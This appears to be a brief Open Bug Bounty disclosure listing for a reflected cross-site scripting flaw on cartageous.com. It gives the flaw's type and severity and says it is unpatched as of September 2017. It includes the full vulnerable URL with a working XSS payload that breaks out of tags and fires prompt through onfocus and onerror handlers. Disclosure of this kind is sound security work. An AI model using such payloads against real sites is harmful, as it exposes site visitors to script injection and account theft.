cartageous.com XSS vulnerability

Open Bug Bounty ID: OBB-680300 Description| Value ---|--- Affected Website:| cartageous.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

cartageous.com XSS vulnerability

Vulnerable URL: http://cartageous.com/?s=a%27aa%22onfocus=prompt/OPENBUGBOUNTY/%20autofocus=x%20bad=--%3E%3C/title%3E%3C/script%3E%3Cimg%20src=x%20onerror=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.09.2017 Vulnerability type:| XSS...